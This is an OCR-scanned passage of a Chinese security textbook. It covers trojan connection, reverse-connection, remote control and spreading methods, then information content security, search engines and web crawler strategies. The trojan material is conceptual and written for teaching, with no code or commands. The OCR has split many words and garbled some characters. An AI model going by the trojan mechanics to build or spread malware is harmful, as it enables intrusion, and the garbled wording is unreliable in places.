6000 端口 为 开放 时 ,控制 端 便 发 起 连接 请 求 ,服务 器 端木 马 程序 立即 响应 ,控制 端 收 到 响 
应 后 ,开启 一 个 随机 端口 与 服务 器 端的 木马 端口 建立 连接 。 这 时 ,一 个 木马 连接 才 真 正 
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@ 信息 反馈 。 木 马 程序 主动 通知 控制 端 所 需要 的 信息 ,发 送 E-mail 或 者 QQ ,宣告 
自己 已 经 成 功 接管 计算 机 ;另外 是 使 用 UDP 或 者 ICMP ,将 服务 器 IP 地 址 通过 免费 主页 
空间 中 转 到 控制 端 。 使 用 E-mail 或 者 即时 消息 的 方式 ,对 攻击 者 来 说 并 不 是 最 好 的 一 种 
选择 ,因为 一 旦 木马 被 发 现 , 可 以 通过 这 个 电子 邮件 的 地 址 找 出 攻击 者 。 

木马 的 服务 器 启动 之 后 , 它 还 可 以 直接 与 攻击 者 计算 机 上 运行 的 控制 端 程序 通过 预 
先 定义 的 端口 进行 通信 (如 反弹 木马 )。 该 方法 可 以 穿 透 木 马 所 在 计算 机 的 防火 墙 ,使 得 
对 木马 攻击 的 防御 更 加 困难 。 

(6) 远程 控制 。 木 马 连 接 建立 后 ,控制 端 端口 和 木马 端 之 间 将 会 出 现 一 条 通信 通道 。 
控制 端 程序 可 通过 这 条 通道 以 及 木马 程序 对 服务 器 端 进行 远程 控制 。 

5. 木马 的 传播 方式 

传统 木马 的 传播 方式 包括 以 下 几 个 方面 : 

(1) 以 邮件 的 附件 形式 传播 。 

(2) 通过 聊天 工具 (MSN .QQ 等 ) 传 播 。 

(3) 通过 软件 下 载 网 站 传播 。 有 些 下 载 网 站 提供 下 载 的 软件 捆绑 了 木马 文件 ,用户 
执行 下 载 文件 的 同时 ,也 运行 了 木马 。 

(4) 通过 一 般 的 病毒 和 蠕虫 传播 。 

(5) 通过 带 木 马 U 盘 和 光盘 传播 。 

随 着 网 站 互动 编程 的 深入 ,木马 的 网 络 传播 有 了 新 的 途径 。 

JavaScript、VBScript、ActiveX 等 技术 的 使 用 ,在 网 页 中 添加 脚本 ,使 得 打开 网 页 的 
同时 ,下 载 安装 木马 。 木 马 也 可 以 通过 交互 脚本 的 方式 植 和 人。 由 于 微软 的 I 下 浏览 器 在 执 
行 Script 脚本 上 存在 一 些 漏洞 ,攻击 者 可 以 利用 这 些 漏洞 传播 木马 ,甚至 直接 对 浏览 器 计 
算 机 进行 文件 操作 等 控制 。 例 如 ,如 果 攻 击 者 有 办 法 把 木马 执行 文件 上 传 到 攻击 主机 的 
一 个 可 执行 目录 里 , 则 可 以 通过 编写 交互 脚本 在 攻击 主机 上 执行 木马 目录 。 木 马 还 可 以 
利用 系统 的 漏洞 进行 植 和 人 ,这 样 蠕虫 和 木马 结合 起 来 。 


en 


9.5 本 章 小 结 


本 章 介 绍 了 当前 软件 安全 严峻 的 现状 ,包括 恶意 软件 .漏洞 .威胁 等 的 统计 数据 。 明 
确 软 件 安全 的 概念 和 研究 的 内 容 。 并 从 多 个 方面 如 软件 工程 .软件 保 证 、 软 件 质 量 、 软 件 
可 靠 性 等 介绍 了 与 软件 安全 相关 的 领域 。 接 下 来 ,从 软件 安全 体系 结构 分 析 的 角度 出 发 ， 
介绍 了 风险 分 析 在 软件 安全 分 析 中 的 作用 。 其 实 , 风 险 分 析 可 以 运用 到 软件 开发 生命 周 
期 的 多 个 阶段 ,因此 以 其 作为 背景 ,又 引入 了 安全 软件 开发 生命 周期 ,这 个 部 分 很 多 是 刚 
发 布 的 研究 成 果 , 特 别 是 BSIMM 模型 。 最 后 .介绍 了 恶意 代码 的 相关 知识 ,包括 恶意 软 
件 的 分 类 和 区 别 .病毒 的 分 析 和 检测 .蠕虫 的 机 理 和 防治 ,木马 的 机 理 和 防治 ,并 概括 了 恶 
意 代码 分 析 的 方法 。 
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本 章 学 习 要 点 : 
局 掌握 信息 内 容 安 全 的 概念 及 关键 技术 ; 

如 熟悉 信息 内 容 安 全 面临 的 安全 威胁 ; 

后 了 解 信息 内 容 安 全 的 相关 应 用 及 发 展 趋势 。 


10.1 信息 内 容 安全 概述 


人 类 社会 已 经 从 蒸汽 机 时 代 、 电 气 化 时 代 , 进 入 到 信息 化 时 代 。 据 2015 年 中 国 互联 
网 信息 中 心 CNNIC 发 布 的 第 35 次 (中国 互联 网 络 发 展 状 况 统计 报告 ), 截 至 2014 年 12 
月 ,中 国 网 民 数 量 已 达到 6. 49 亿 , 其 中 手机 网 民 规模 达 5. 57 亿 , 互 联网 总 体 普 及 率 为 
47.9%。 该 报告 指出 ,43.8% 的 中 国 网 民 表 示 喜 欢 在 互联 网 上 发 表 评 论 ;53.1% 的 中 国 网 
民 认 为 自身 比较 或 非常 依赖 于 互联 网 。 互 联网 被 认为 是 继 报 纸 ,广播 和 电视 等 之 后 的 新 
型 信息 传播 媒体 ,具有 便捷 性 .即时 性 .自由 性 .开放 性 、 虚 拟 性 、 交 互 性 等 优势 。 网 络 全 然 
已 成 为 和 现实 世界 并 存 的 虚拟 世界 .人 们 从 中 可 享受 自由 交往 和 沟通 便利 等 优点 ,如 即时 
通讯 .搜索 引擎 ,网 上 购物 .网络 社交 、 网 络 视频 .网络 银行 .电子 邮件 等 。 可 见 ,互联 网 的 
发 展 已 经 深刻 地 改变 了 人 们 的 工作 和 生活 方式 。 

然而 ,互联 网 上 信息 内 容 的 非法 传播 和 利用 将 会 对 社会 稳定 和 国家 安全 具有 较 大 的 
影响 。 在 2007 年 ,胡锦涛 总 书记 就 强调 要 加 强 网 络 文化 建设 和 管理 。 在 2013 年 ,习近平 
总 书记 在 (中共 中 央 关 于 全 面 深化 改革 若干 重大 问题 的 决定 ) 的 说 明 中 进一步 指出 :“ 随 
着 互联 网 媒体 属性 越 来 越 强 ,网 上 媒体 管理 和 产业 管理 远 远 跟 不 上 形势 发 展 变化 。 特 别 
是 面 对 传 播 快 .影响 大 、 覆 盖 广 ,社会 动员 能 力 强 的 微 博客 、 微 信 等 社交 网 络 和 即时 通信 工 
具 用 户 的 快速 增长 ,如 何 加 强 网 络 法 制 建设 和 与 论 引 导 ,确保 网 络 信息 传播 秩序 和 国家 安 
全 、 社 会 稳定 ,已 经 成 为 摆 在 我 们 面前 的 现实 突出 问题 .可 见 ,信息 内 容 安全 已 经 成 为 国 
家 信息 安全 保障 建设 的 一 个 重要 方面 。 


1011 信息 内 容 安 全 的 概念 


要 了 解 信息 内 容 安全 ,首先 要 了 解 什么 是 信息 内 容 。1995 年 ,西方 七 国信 息 会 议 首 
次 提出 内 容 产 业 (Content Industry) 的 概念 ;到 1997 年 ,美国 发 布 (北美 产业 分 类 系统 》 
中 ,提出 使 用 信息 内 容 产 业 ; 在 1996 年 ,欧盟 提出 *INFO 2000 计划 ”给 出 了 信息 内 容 产 业 
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的 范围 :“ 制 造 , 开 发 .包装 和 销售 信息 产品 及 其 服务 的 产业 .信息 内 容 的 主要 表现 形式 
包括 : 文本 图像 音频、 视频 等 ,如 电子 文档 、 网 络 新 闻 、. 电 子 邮 件 .JPEG 图 像 等 ,具有 数 
字 化 、 多 样 性 、. 易 复制 . 易 分 发 .交互 性 等 特点 。 在 本 书 中 ,信息 内 容 泛 指 互联 网 中 的 半 结 
构 化 和 非 结 构 化 数据 ,包括 文本 数据 和 多 媒体 数据 。 

目前 ,国内 外 关于 信息 内 容 安全 没有 统一 的 定义 。 方 滨 兴 院士 定义 内 容 安全 为 :“ 对 
信息 真实 内 容 的 隐藏 .发现 .选择 性 阻 断 ." 具 体 要 解决 的 问题 包括 发 现 隐藏 信息 的 真实 内 
容 \ 阻 断 所 指定 的 信息 挖掘 所 关心 的 信息 ;主要 的 技术 手段 是 信息 识别 与 挖掘 技术 、 过 滤 
技术 、 隐 藏 技术 等 。 李 建华 等 定义 信息 内 容 安 全 (Information Content Security) 为 :“ 研 
究 如 何 计算 从 包含 海量 信息 且 迅 速 变化 的 网 络 中 ,对 与 特定 安全 主题 相关 信息 进行 自动 
获取 ,识别 和 分 析 的 技术 。 根 据 所 处 的 网 络 环境 ,又 被 称 为 网 络 内 容 安 全 (Network 
Content Security) 。” 

总 之 ,信息 内 容 安全 是 指 信息 内 容 的 产生 ,发 布 和 传播 过 程 中 对 信息 内 容 本 身 及 其 相 
应 执行 者 行为 进行 安全 防护 ,管理 和 控制 。 可 见 , 信 息 内 容 安全 的 目标 是 要 保证 信息 利用 
的 安全 , 即 在 获取 信息 内 容 的 基础 上 ,分 析 信息 内 容 是 否 合法 ,确保 合法 内 容 安 全 ,阻止 非 
法 内 容 的 传播 和 利用 。 其 中 ,互联 网 上 非法 内 容 的 界定 在 我 国 2000 年 颁布 的 (互联 网 信 
息 服务 管理 办 法 ) 第 十 五 条 中 有 相关 的 规定 : 危害 国家 安全 ,泄露 国家 秘密 ,颠覆 国家 政 
权 , 破 坏 国家 统一 的 ;损害 国家 荣誉 和 利益 的 ;煽动 民族 仇恨 、 民 族 歧视 ,破坏 民族 团结 的 ; 
破坏 国家 宗教 政策 ,宣扬 邪教 和 封建 迷信 的 ;散布 谣言 ,扰乱 社会 秩序 ,破坏 社会 稳定 的 ; 
散布 淫秽 、 色 情 、 赌 博 ` 暴 力 、 凶 杀 、 恐 怖 或 者 教唆 犯罪 的 ;侮辱 或 者 诽谤 他 人 ,侵害 他 人 合 
法 权益 的 ;含有 法 律 \ 行 政法 规 禁止 的 其 他 内 容 的 。 


1012 信息 内 容 安 全 威胁 


由 于 互联 网 的 开放 性 、 共 享 性 动态 性 、 自 由 性 等 特点 ,信息 内 容 安全 面临 严峻 的 挑 
战 ,涉及 政治 \ 经 济 、 文 化 、 健 康 \ 保 密 、 隐 私 、 产 权 等 各 个 方面 。 除 了 传统 的 信息 安全 威胁 ， 
如 信息 内 容 泄露 , 自 改 、 破 坏 、 黑 客 攻 击 、 计 算 机 病毒 等 ,具体 已 经 在 前 面 章 节 作 了 介绍 , 信 
息 内 容 安全 还 存在 以 下 威胁 : 

1. 互联 网 上 各 种 不 良 信息 内 容 泛 滥 

当前 ,网 上 充斥 着 大 量 的 不 良 信息 内 容 , 如 色情 、 暴 力 \ 反 动 、 赌 博 、 诈 骗 .诽谤 等 信息 ， 
严重 阻碍 互联 网 的 健康 发 展 。 据 2010 年 的 统计 数据 ,全 球 互联 网 网 站 中 有 12% 是 黄色 
网 站 ,共有 2464. 4 多 万 个 ,每 秒 钟 全 球 平均 有 28258 名 网 民 在 浏览 黄色 网 站 。 为 了 浏览 
黄色 网 站 ,网 民 们 投入 了 大 量 金钱 。 调 查 显 示 , 美 国 的 黄色 网 站 每 年 获 利 28. 4 亿美 元 ,全 
世界 网 民 每 年 在 黄色 网 站 上 的 花费 达 49 亿美 元 ,平均 每 秒 超过 3000 美元 。 此 外 , 据 
2014 年 有 关 新 闻 报 道 ,搜索 引擎 被 大 量 赌博 网 站 入 侵 , 部 分 地 方 政府 网 站 成 为 最 大 的 受 
害 者 。 

2. 互联 网 上 垃圾 信息 内 容 严 重 过 载 

互联 网 上 充斥 着 各 种 垃圾 信息 如 垃圾 邮件 、 垃 圾 短信 等 ,占用 了 大 量 的 存储 资源 和 带 
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宽 , 严 重地 影响 网 络 性 能 和 危害 用 户 的 合法 权益 。 据 2014 年 第 三 季度 发 布 的 (中 国 反 垃 
圾 邮件 状况 调查 报告 》, 中 国电 子 邮 箱 用 户 平均 每 周 收 到 垃圾 邮件 数量 为 12. 8 封 ,所 占 比 
例 为 33.1% ;用 户 平均 每 周 花费 8. 7 分 钟 处 理 垃圾 邮件 。 另 据 2014 年 上 半年 发 布 的 ( 手 
机 短信 状况 调查 报告 ,用 户 平 均 每 周 收 到 的 垃圾 短信 息 数量 为 12. 0 条 。 垃 圾 邮件 和 短 
信 等 发 送 的 不 良 信息 内 容 对 用 户 的 经 济 和 生活 产生 巨大 的 负面 影响 。 

3. 互联 网 不 良 信息 内 容 的 传播 和 利用 

网 络 谣言 、 网 络 诈骗 .网络 暴力 等 不 良 信息 内 容 的 传播 和 利用 对 个 人 身心 健康 和 社会 
公共 安全 造成 极 大 的 威胁 。 从 地 域 来 看 ,互联 网 信息 内 容 的 传播 途径 主要 有 两 种 : 一 种 
是 信息 源 在 国外 ,信息 内 容 通过 各 种 途径 非法 从 国外 传 至 国内 ; 另 一 种 是 信息 源 在 国内 ， 
信息 内 容 非 法 从 国内 传 至 国外 。 典 型 的 案例 ,如 2006 年 虐 猫 人 肉 搜索 事件 ;2008 年 柑橘 
蛆虫 事件 严重 影响 全 国 部 分 地 区 销售 ;2010 年 金庸 被 死亡 事件 ;2011 年 日 本 核 事故 泄漏 
引发 抢购 食盐 事件 ;2014 年 周星驰 被 炮 又 事件 ;2015 年 何 呈 吃 空 饮 事 件 等 。 可 见 ,不 良 信 
息 的 传播 和 利用 已 经 成 为 信息 内 容 安全 的 一 个 重要 的 威胁 。 

4. 互联 网 中 信息 内 容 侵权 行为 猩 狐 

由 于 信息 内 容 的 数字 化 ,在 互联 网 环境 下 信息 内 容 具 有 易 无 损 复 制 、 容 易 货 改 、 传 
播 成 本 低 等 特点 ,从 而 模糊 了 合理 使 用 和 侵权 行为 之 间 的 界限 ,使 得 信息 内 容 版 权 所 
有 者 的 合法 权益 得 不 到 保障 , 极 大 地 阻碍 了 信息 内 容 产 业 的 发 展 。 例 如 ,2005 年 起 , 美 
国 的 作者 行 会 和 美国 出 版 商 协 会 指控 Google 公司 扫描 和 以 数字 化 方式 发 布 各 大 图 书 
馆藏 书 内 容 的 计划 触犯 版 权 法 。 在 2011 年 ,多 名 作家 控告 百度 文库 在 未 经 许可 条 件 
下 ,将 作品 放 人 百度 文库 平台 ,免费 向 公众 开放 。 同 年 ,多 家 媒体 公司 控诉 百度 影音 涉 
嫌 视 频 盗版 侵权 等 。 这 些 盗版 和 侵权 行为 已 经 成 为 信息 内 容 产业 的 主要 威胁 之 一 , 严 
重地 制约 了 互联 网 的 发 展 。 


1013 信息 内 容 安 全 体系 架构 


信息 安全 学 科 主 要 研究 信息 的 机 密 性 、 完 整 性 .可 用 性 .可 控 性 以 及 抗 抵赖 性 等 安全 
属性 的 一 门 综合 性 学 科 ,主要 包括 : 设备 安全 ,数据 安全 、 内 容 安全 和 行为 安全 四 个 层面 。 
信息 内 容 安全 作为 信息 安全 在 政治 法律 和 道德 层次 上 的 要 求 , 旨 在 分 析 和 识别 信息 内 容 
的 基础 上 ,解决 信息 内 容 利用 方面 的 安全 防护 ,保障 对 信息 内 容 传播 和 利用 的 控制 能 力 。 

从 学 科 特 点 上 看 ,信息 内 容 安 全 是 通用 网 络 内 容 分 析 的 一 个 分 支 ,涉及 计算 机 网 络 、 
数据 挖掘 ,机 器 学 习 、 信 息 检索 .中 文 信息 分 析 、 信 息 论 和 统计 学 等 多 门 学 科 的 交叉 。 根 据 
对 信息 内 容 安 全 定义 ,按照 “获取 分析、 管理 ,控制 ”的 一 体 化 信息 内 容 安全 策略 ,本 书 给 
出 信息 内 容 安全 体系 架构 如 图 10-1 所 示 。 该 体系 结构 由 信息 内 容 获取 、 信 息 内 容 分 析 与 
识别 ,信息 内 容 管理 和 控制 等 模块 构成 ,系统 可 实现 互联 网 数据 的 采集 、 不 良 信息 内 容 的 
识别 与 分 析 \ 不 良 信息 内 容 的 过 滤 与 阻 断 ` 敏 感 信息 内 容 的 隐藏 以 及 信息 内 容 版 权 保护 等 
功能 。 
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一 信息 内 容 主动 获取 技术 


图 10-1 信息 内 容 安全 体系 架构 


10.2 信息 内 容 获取 技术 


信息 内 容 获取 是 数据 收集 过 程 , 而 如 何 从 互联 网 中 有 效 获取 信息 内 容 是 后 续 信息 内 
容 识 别 与 分 析 的 基础 。 本 节 介 绍 当前 两 种 主要 的 信息 内 容 获 取 技术 : 信息 内 容 主动 获取 
技术 和 信息 内 容 被 动 获取 技术 。 

信息 内 容 主 动 获取 技术 是 通过 向 网 络 中 注入 数据 包 后 的 反馈 来 获取 信息 ,其 特点 是 
接 入 方式 简单 .能 广泛 获取 信息 内 容 , 但 会 对 网 络 造 成 额外 负荷 ,如 搜索 引擎 技术 。 信 息 
内 容 被 动 获取 技术 是 将 设备 接 入 网 络 的 特定 部 位 进行 获取 ,在 网 络 出 入 口上 通过 镜像 或 
旁 路 侦 听 方式 获取 网 络 信息 ,其 特点 是 接 入 需要 网 络 管理 者 的 协作 ,获取 的 内 容 仅 限于 进 
出 本 地 网 络 的 数据 流 , 但 不 会 对 网 络 造成 额外 流量 ,如 网 络 数据 包 捕 获 技术 。 在 参考 文献 
[13J 中 ,还 介绍 了 数据 挖掘 技术 的 主动 信息 内 容 获 取 技 术 , 以 及 信息 推荐 的 被 动 信息 内 容 
获取 技术 。 本 书 分 别 以 搜索 引擎 技术 和 网 络 数据 包 捕 获 技术 两 种 常用 的 技术 为 代表 , 介 
绍 网 络 信息 内 容 主 动 和 被 动 获 取 的 相关 技术 原理 和 过 程 。 
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本 节 以 搜索 引擎 技术 为 例 , 曾 述 互联 网 信息 内 容 的 主动 获取 技术 的 原理 和 过 程 。 在 
互联 网 发 展 初期 ,网 站 数量 相对 较 少 ,从 互联 网 上 获取 信息 相对 容易 ;然而 , 随 着 互联 网 爆 
炸 性 发 展 ,用 户 难 以 从 海量 信息 中 找到 满足 需求 的 资料 信息 ,Web 信息 检索 在 此 背景 下 
应 运 而 生 ,搜索 引擎 作为 最 常见 的 Web 信息 检索 系统 在 实际 生活 中 得 到 广泛 的 应 用 。 

1. 搜索 引擎 发 展 概述 

1990 年 , Montreal 的 McGill University 学 生 Alan Emtage、Peter Deutsch、 Bill 
Wheelan 发 明了 Archie,1993 年 , Matthew Gray 开发 出 第 一 个 “机 器 人 (Robot) ”程序 
World Wide Web Wanderer。 该 程序 在 Web 上 沿 着 网 页 间 的 链接 关系 候 行 ,又 称 为 “ 蜂 
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蛛 (Spider)”, 起 初 用 于 统计 互联 网 上 服务 器 的 个 数 , 后 来 发 展 到 能 检索 网 络 域名 ,在 此 基 
础 上 ,1994 年 Brian Pinkerton 开发 出 第 一 个 支持 全 文 搜索 引擎 WebCrawler, 在 这 一 年 
里 ,Michael Mauldin 将 John Leavitt 的 Spider 程序 接 人 其 索引 程序 中 推出 搜索 引擎 
Lycos,Stanford University 的 两 名 博士 生 David Filo 和 美 籍 华人 Jerry Yang 共同 创办 了 
Yahoo! ,到 1998 年 ,采用 PageRank 技术 的 Google 搜索 引擎 的 发 布 成 为 全 球 最 受 欢 迎 的 
搜索 引擎 ,到 2000 年 , 几 位 美国 留学 华人 回国 创业 推出 了 Baidu 搜索 引擎 。 在 2003 年 ， 
中 国 搜索 CEO 陈 沛 提出 了 第 三 代 搜 索引 擎 的 概念 ,在 2004 年 推出 网 络 猪 ,到 2011 年 , 正 
式 推 出 中 搜 第 三 代 搜 索引 擎 平台 。 当 前 ,有 较 多 的 公司 加 入 到 搜索 引擎 的 研究 和 开发 中 ， 
常用 的 搜索 引擎 有 : Google、Baidu、Yahoo!、Bing 等 。 

2. 搜索 引擎 概念 及 分 类 

搜索 引擎 (Search Engine) 是 一 种 在 Web 上 应 用 的 软件 系统 , 它 以 一 定 的 策略 在 
Web 上 搜集 和 发 现 信息 ,在 对 信息 进行 处 理 和 组 织 而 建立 数据 库 , 为 用 户 提供 Web 信息 
查询 服务 。 即 搜索 引擎 后 台 通过 疏 虫 程序 遍历 Web, 同 时 下 载 和 存储 分 布 在 Web 上 的 
信息 ,并 建立 相应 的 索引 记录 ;前 端 为 用 户 提 供 网 页 界面 ,接受 用 户 的 查询 请 求 ,根据 建立 
的 索引 按照 一 定 的 排列 顺序 为 用 户 提供 信息 检索 服务 。 

根据 工作 原理 ,搜索 引擎 可 分 为 : 全 文 搜索 引擎 (Full Text Search Engine)、 目 录 式 
搜索 引擎 (Directory Search Engine) 和 元 搜索 引擎 (Meta Search Engine) 。 全 文 搜索 引擎 
是 通过 将 互联 网 上 抓 取 的 网 站 信息 存 和 人 数据库 并 建立 索引 ,然后 查找 满足 用 户 需求 的 记 
录 信 息 ,并 按照 一 定 的 排列 顺序 返回 给 用 户 , 是 真正 意义 上 的 搜索 引擎 ,如 Google、Baidu 
等 。 目 录 式 搜索 引擎 是 通过 人 工 或 半自动 化 方式 发 现 信息 ,依靠 编目 员 的 知识 将 信息 划 
分 到 事先 已 确定 的 分 类 框架 中 ,用 户 不 需要 进行 关键 字 查询 , 仅 依靠 分 类 目录 即 可 找到 所 
需要 的 信息 ,如 Yahoo! 搜狐 等 。 元 搜索 引擎 通过 一 个 统一 的 用 户 界面 ,调用 多 个 搜索 引 
擎 进行 搜索 ,然后 将 这 些 搜索 引擎 的 查询 结果 经 过 归并 \、 去 重 等 处 理 后 返回 给 用 户 ,如 
InfoSpace、Dogpile 等 。 

根据 搜索 范围 ,搜索 引擎 可 分 为 : 综合 搜索 引擎 和 垂直 搜索 引擎 。 综 合 搜索 引擎 即 
为 通常 意义 上 的 引擎 ,可 根据 用 户 的 需求 检索 任何 类 型 .任何 主题 的 资源 ;垂直 搜索 引擎 
是 针对 某 特定 领域 的 结构 化 内 容 的 搜索 技术 ,是 对 Web 信息 中 的 某 类 专门 的 信息 进行 处 
理 、 整 合 ,定向 分 字段 抽取 出 需要 的 数据 进行 处 理 后 青 以 某 种 形式 返回 给 用 户 的 搜索 方 
式 , 如 去 哪儿 搜索 引擎 等 。 

3. 搜索 引擎 体系 结构 及 工作 流程 

搜索 引擎 技术 是 要 在 考虑 信息 的 关联 性 的 基础 上 , 尽 可 能 地 使 搜索 效率 快 、 搜 索 结 果 
全 面 、 搜 索 准 确 度 高 。 当 用 户 提交 查询 请 求 时 ,搜索 引擎 并 不 真正 搜索 整个 互联 网 ,而 是 
搜索 事先 已 整理 好 的 网 页 索引 数据 库 ,其 体系 结构 如 图 10-2 所 示 。 

根据 每 个 部 件 功能 的 划分 ,将 搜索 引擎 的 体系 结构 进行 抽象 ,其 三 段 式 工作 流程 如 
图 10-3 所 示 ,主要 由 网 页 搜索 、 预 处 理 和 检索 服务 三 部 分 组 成 。 

(1) 网 页 搜集 。 该 阶段 主要 用 来 抓 取 网 页 信息 , 存 和 数据库, 是 搜索 引擎 提供 信息 检 
索 服务 的 基础 。 网 页 信息 的 抓 取 一 般 是 将 网 页 集合 抽象 为 一 个 有 向 图 模型 ,然后 按照 一 
定 的 策略 进行 ,该 部 分 是 本 节 讨 论 的 重点 ,详细 过 程 将 在 下 节 进 行 介 绍 。 在 将 网 页 内 容 存 
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图 10-2 搜索 引擎 体系 结构 
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和 数据库 ,对 数据 库 维护 的 基本 策略 包括 批量 搜集 和 增 量 搜集 两 种 形式 。 批 量 搜集 是 用 
每 一 次 搜索 的 结果 替换 上 一 次 的 内 容 , 其 主要 优点 在 于 系统 实现 简单 ,然而 容易 因 重 复 搜 
索 带 来 额外 的 带宽 消耗 ,同时 时 新 性 不 强 。 增 量 搜集 是 开始 搜索 一 批 ,后 来 只 搜索 有 改变 
的 网 页 和 新 出 现 的 网 页 ,同时 删除 上 次 搜索 后 不 再 存在 的 网 页 ,其 具有 较 高 的 时 新 性 ,但 
系统 实现 较为 复杂 。 

(2) 预 处 理 。 在 建立 好 网 页 数据 库 后 ,要 提供 网 页 信息 检索 服务 ,需要 为 网 页 数据 库 
进行 预 处 理 ,具体 包括 : 关键 词 提取 、 网 页 消 重 、 链 接 分 析 和 索引 构建 四 个 部 分 。 中 关键 
词 提取 主要 将 网 页 文档 进行 分 词 处 理 和 表示 后 , 找 出 能 代表 文档 内 容 的 特征 词 。 四 网 页 
消 重用 来 克服 查询 结果 中 内 容重 复 或 主题 内 容重 复 的 问题 ,有 效 缓解 网 页 检索 时 间 和 带 
宽 ,提高 用 户 体验 。@ 链 接 分 析 通过 分 析 网 页 之 间 的 关联 关系 可 解决 基于 内 容 搜 索引 擎 
搜索 不 到 的 结果 ,同时 可 判断 网 页 的 相对 重要 程度 。@ 索 引 构 建 主要 利用 关键 词 集合 和 
文档 编号 形成 倒 排 文 件 结构 作为 网 页 的 组 织 结构 ,其 中 可 将 文档 作为 索引 目标 结构 ,文档 
中 的 关键 字 作为 索引 。 

(3) 检索 服务 。 检 索 服 务 是 在 网 页 搜索 和 预 处 理 的 基础 上 ,根据 用 户 的 需求 得 到 检 
索 结 果 ,并 按 一 定 的 排列 顺序 返回 给 用 户 。 因 此 ,该 阶段 主要 包括 : 查询 方式 和 匹配 、 结 
果 排 序 以 及 文档 摘要 生成 。 吕 查询 方式 和 匹配 主要 刻画 用 户 的 查询 信息 需求 ,一 般 采 用 
一 个 词 或 短语 来 直接 表达 ,对 于 短语 需要 进行 分 词 处 理 ; 然 后 按照 信息 检索 模型 (如 集合 
论 模型 、 代 数论 模型 及 概率 模型 等 ) 匹 配 查询 需求 关键 字 和 已 经 建立 的 索引 关键 字 。@ 结 
果 排 序 是 指 根据 查询 结果 与 用 户 需求 之 间 的 相关 性 ,按照 信息 的 重要 程度 对 返回 的 结果 
进行 排序 的 过 程 , 排 序 方法 有 倒 排 文件 ,PageRank、HITS 等 。@ 文 档 摘 要 是 构成 每 条 查 
询 结 果 的 元 素 之 一 ,其 他 还 包括 标题 和 网 址 ,主要 的 生成 方法 包括 : 静态 方法 和 动态 方 
式 。 静 态 方式 按照 某 种 规则 ,在 预 处 理 阶 段 就 从 网 页 内 容 中 提取 部 分 文字 作为 摘要 ;动态 
方式 是 在 响应 查询 时 ,根据 查询 词 在 文档 中 的 位 置 , 提 取 周围 的 文字 作为 摘要 。 

4. 网 络 信 息 抓 取 技 术 原 理 

本 节 重 点 介绍 利用 搜索 引擎 从 网 页 上 获取 信息 内 容 的 技术 原理 , 即 搜索 引擎 体系 结 
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构 中 的 信息 搜索 器 ,又 被 称 为 网 络 怜 虫 (Web Crawler) 或 网 络 蜂 蛛 (Web Spider) 。 

实质 上 ,网 络 疏 虫 是 一 个 基于 HTTP 协议 的 网 络 程序 ,其 主要 工作 原理 : 将 初始 的 
URL 集合 放 入 一 个 待 仆 行 的 URL 队列 中 ,然后 按照 一 定 的 顺序 从 中 读 取 URL ,解析 出 
此 URL 中 主机 名 对 应 的 IP 地 址 ,使 用 HTTP 协议 指向 此 IP 地 址 所 对 应 的 Web 服务 
器 ,下 载 此 URL 对 应 的 网 页 并 将 该 URL 放 入 已 抓 取 URL 集 , 然 后 分 析 页 面 内 容 , 提 取 
页 面 中 所 有 的 链接 URL, 对 于 提取 到 的 每 个 链接 URL, 判 断 是 否 已 经 在 已 抓 取 URL 集 
合 中 ,对 于 新 的 URL 则 加 入 到 待 仆 行 的 URL 队列 中 ,重复 该 过 程 ,获取 更 多 的 页 面 , 直 
到 待 疏 行 的 队列 为 空 ,具体 如 图 10-4 所 示 ,该 过 程 为 通用 网 络 仆 虫 ,大 多 数 仆 虫 算法 均 遵 


循 该 工作 流程 。 
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图 10-4 网 络 息 虫 工作 流程 


除 此 之 外 ,网 络 息 虫 还 包括 批量 型 息 虫 (Batch Crawler)、 增 量 型 候 虫 (Incremental 
Crawler) 及 垂直 型 候 虫 (Focused Crawler)。 具 体 而 言 , 批 量 型 仆 虫 具有 比较 明确 的 抓 取 
范围 和 目标 , 当 达 到 所 设 定 的 目标 后 , 怜 虫 程序 即 停止 ;而 增 量 型 怜 虫 会 持续 不 断 的 抓 取 
新 网 页 ,以 及 更 新 已 有 的 网 页 ;垂直 型 仆 虫 则 是 抓 取 特 定 主题 内 容 或 特定 领域 的 网 页 。 

在 网 络 疏 虫 中 ,另外 一 个 很 重要 的 问题 即 是 如 何 对 待 抓 取 URL 队列 中 的 URL 进行 
调度 , 即 先 抓 取 哪 个 页 面 ,后 抓 取 哪 个 页 面 。 而 决定 这 些 URL 排列 顺序 的 调度 方法 即 为 
网 页 抓 取 策略 或 网 络 怜 虫 搜索 策略 。 目 前 ,常见 的 网 络 疏 虫 搜索 策略 有 : 

(1) 深度 或 广度 优先 搜索 策略 。 网 页 之 间 的 关系 可 抽象 为 图 模型 ,因此 可 将 图 论 中 
的 深度 优先 算法 和 广度 优先 算法 应 用 到 网 络 疏 虫 中 。 深 度 优 先 搜索 策略 是 从 选 定 页 面 中 
未 处 理 的 某 个 超 链 接 出 发 ,按照 一 条 线路 一 条 链接 接着 一 条 链接 地 搜索 下 去 ,直到 搜索 完 
该 整 条 链 ,之 后 才 从 另外 一 个 超 链 接 开始 重复 该 搜索 过 程 , 直 到 所 有 初始 页 面 的 所 有 链接 
都 被 处 理 完 。 该 搜索 策略 容易 导致 候 虫 的 陷入 问题 , 即 进 入 之 后 ,无 法 出 来 。 广 度 优先 搜 
索 策略 是 将 新 的 URL 放 到 待 抓 取 队 列 的 队 尾 ,优先 抓 取 某 网 页 中 链接 的 所 有 网 页 ,然后 
选择 其 中 的 一 个 链接 网 页 ,继续 抓 取 在 此 网 页 中 链接 的 所 有 网 页 。 目 前 ,网 络 疏 虫 大 都 使 
用 的 是 广度 优先 搜索 策略 。 

(2) 非 完全 PageRank 策略 。 将 下 载 的 网 页 和 待 抓 取 URL 队列 合 在 一 起 形成 网 页 
集合 ,在 该 集合 内 部 进行 PageRank 值 的 计算 ,然后 按照 PageRank 值 对 待 抓 取 URL 进 
行 排序 ,得 到 的 结果 即 为 网 络 候 忠和 每 次 读 取 URL 的 顺序 。PageRank 是 在 下 载 完 所 有 的 
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网 页 之 后 ,计算 得 到 的 排序 结果 才 是 可 靠 的 :然而 ,网 络 怜 虫 是 在 运行 过 程 中 只 能 得 到 部 
分 网 页 ,因而 计算 得 到 的 结果 是 不 可 靠 的 ,也 即 是 非 完全 PageRank 的 原因 。 

(3) OPIC (Online Page Importance Computation ) 搜索 策略 。OPIC 的 思想 和 
PageRank 的 思想 类 似 , 在 算法 开始 之 前 ,给 每 个 页 面相 同 的 现金 (Cash) ,当下 载 某 个 页 
